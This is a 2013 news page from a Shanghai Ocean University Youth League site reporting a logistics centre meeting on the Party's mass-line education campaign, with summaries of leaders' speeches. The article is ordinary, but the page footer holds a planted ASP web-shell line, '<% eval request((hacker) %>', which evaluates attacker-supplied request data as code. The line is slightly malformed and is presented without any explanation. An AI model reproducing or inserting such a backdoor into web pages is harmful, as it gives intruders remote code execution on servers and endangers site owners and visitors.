当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
后勤服务中心召开党的群众路线教育实践活动动员会暨座谈会
[2013年09月24日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    9月22日上午,后勤服务中心在图文信息中心102会议室召开党的群众路线教育实践活动动员会暨座谈会。校第六督导小组组长、副校长封金章,校第六督导小组成员、学生处处长朱克勇,后勤服务中心领导班子成员和部分员工代表参加了动员大会。会议由后勤服务中心总经理王国华主持。

    首先,后勤服务中心副总经理陆文宣宣读了中心党的群众路线教育实践活动组织机构名单。

    后勤服务中心党支部书记金晔对中心党的群众路线教育实践活动作动员会报告。金书记从实践教育活动的意义、“四风”问题在实际工作中的突出表现着手,希望全体党员践行“为民、务实、清廉” 的党风廉政建设要求,希望全体党员在思想上重视、行动上贯彻、学习上下功夫,真抓实干、务实求效,希望全体党员在增强服务意识、领导干部带头、党员示范引领、为民服务办实事上取得新的成效。随后金书记对党的群众路线教育实践活动三个步骤进行了部署。

    校第六督导小组组长、副校长封金章在讲话中指出,党的群众路线教育实践活动是党的十八大全面分析党所面临新的问题而提出的,是党自身建设的需要、是适应新时期新形势的需要,从学校党建来讲,要正视目前高等教育存在的问题,要防止社会不良之风的侵蚀,领导班子要查找自身建设中的问题,要关注学校发展、关心师生权益;从后勤服务中心来讲,要按照学校整体要求分阶段开展,要适应服务群体需求的变化,提供师生满意的服务,要结合学校、后勤、员工个人实际,有针对性的查找问题,最终的落脚点是解决问题。

    动员会后,校第六督导小组分别与后勤服务中心员工代表、党政班子召开座谈会,听取对校领导班子及成员和中心领导班子及成员的民主评议。与会人员充分结合本部门实际,就反对形式主义、官僚主义、享乐主义、奢靡之风进行了发言,提出了意见和建议。

                                                      

 

关闭窗口

上一篇:我校召开2013-2014学年第一次校行政例会

下一篇:我校2013级学生军训阅兵式顺利举行
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>